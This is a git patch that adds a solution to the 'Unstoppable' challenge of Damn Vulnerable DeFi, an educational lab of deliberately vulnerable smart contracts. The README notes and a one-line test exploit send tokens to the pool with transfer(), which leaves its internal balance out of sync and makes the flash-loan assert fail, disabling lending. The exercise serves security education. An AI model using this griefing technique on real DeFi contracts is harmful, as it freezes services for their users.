From ac9c1ef27baffe4456402a441c0ffc697d2a795a Mon Sep 17 00:00:00 2001 From: Olivier Delfosse Date: Thu, 23 Dec 2021 22:36:59 +0100 Subject: [PATCH] unstoppable solved -> contract is broken --- README.md | 16 ++++++++++++++++ test/unstoppable/unstoppable.challenge.js | 5 +++++ 2 files changed, 21 insertions(+) diff --git a/README.md b/README.md index 1527dc177..949601ba8 100644 --- a/README.md +++ b/README.md @@ -15,3 +15,19 @@ Visit [damnvulnerabledefi.xyz](https://damnvulnerabledefi.xyz) All Solidity code, practices and patterns in this repository are DAMN VULNERABLE and for educational purposes only. DO NOT USE IN PRODUCTION. + + +## My solution: + +* Unstoppable +There's a lending pool with a million DVT tokens in balance, offering flash loans for free. +If only there was a way to attack and stop the pool from offering flash loans ... +You start with 100 DVT tokens in balance. + +Solution: ./test/unstoppable/unstoppable.challenge.js +on this.token: +using transfer() instead of depositTokens() +-> poolBalance = poolBalance.add(amount); is not trigger +then, when calling function flashloan: +-> assert(poolBalance == balanceBefore); // is now False + diff --git a/test/unstoppable/unstoppable.challenge.js b/test/unstoppable/unstoppable.challenge.js index 723981300..f1f0d725c 100644 --- a/test/unstoppable/unstoppable.challenge.js +++ b/test/unstoppable/unstoppable.challenge.js @@ -40,6 +40,11 @@ describe('[Challenge] Unstoppable', function () { it('Exploit', async function () { /** CODE YOUR EXPLOIT HERE */ + // on this.token: + // using transfer() instead of depositTokens() -> poolBalance = poolBalance.add(amount); is not trigger + // then, inside function flashloan: + // assert(poolBalance == balanceBefore); // is now false + await this.token.connect(attacker).transfer(this.pool.address, INITIAL_ATTACKER_TOKEN_BALANCE); }); after(async function () {